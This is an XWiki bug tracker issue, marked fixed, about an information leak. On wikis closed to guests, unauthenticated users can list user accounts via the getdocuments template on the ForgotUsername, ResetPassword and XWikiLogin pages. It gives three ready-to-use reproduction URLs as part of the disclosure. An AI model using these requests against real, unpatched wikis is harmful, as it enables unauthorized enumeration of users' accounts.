Details
-
Bug
-
Resolution: Fixed
-
Minor
-
8.4.5, 10.11.8, 11.3.1, 13.6-rc-1
-
Unit
-
Low
-
Hard
-
N/A
-
N/A
-
Description
An unauthenticated user can retrieve the list of users through a public accessible URL
Note: the dataleak is only true in case of a closed wiki, with specific rights to allow the usage of ForgotUsername/ResetPassword pages.
Note: a "closed wiki" is when "Prevent unregistered users from viewing pages, regardless of the page rights in the User" is checked in the admin (XWiki.XWikiPreference.authenticate_view = true)
To reproduce this access one of the following:
<server>/xwiki/bin/get/XWiki/ForgotUsername?xpage=getdocuments&childrenOf=XWiki&exclude=XWiki.ForgotUsername&queryFilters=unique,hidden&offset=1&limit=100&reqNo=2
<server>/xwiki/bin/get/XWiki/ResetPassword?xpage=getdocuments&childrenOf=XWiki&exclude=XWiki.ResetPassword&queryFilters=unique,hidden&offset=1&limit=100&reqNo=2
<server>/xwiki/bin/login/XWikiLogin?xpage=getdocuments&limit=10000
Note: ForgotUsername/ResetPassword are not accessible anymore, but the issue is still true for XWikiLogin, and needs to be solved in a general way.
II managed to make them inaccessible by removing the XwikiGuest user from objects of these pages:
- <server>/xwiki/bin/edit/XWiki/ResetPassword
- <server>/xwiki/bin/edit/XWiki/ForgotUsername
But this makes the Reset password / username unusable.
Note that this issue is not directly related to ResetPassword / ForgotUsername pages: it exists for any page of the wiki available for guest user.
In addition to getdocuments from the examples above, the following templates could also be used in the same way, and have been fixed accordingly:
- getdeleteddocuments.vm
- getgroupmembers.vm
- getgroups.vm
- getusers.vm
Attachments
Issue Links
- causes
-
-
- Closed
-
- depends on
-
-
- Closed
-
- is related to
-
-
- Closed
-
-
-
- Closed
-
- relates to
-
-
- Closed
-
-
-
- Closed
-
-
-
- Closed
-
-
-
- Closed
-
-
-
- Closed
-
-
XWIKI-9649 Don't display not viewable documents in livetable
-
- Open
-
- links to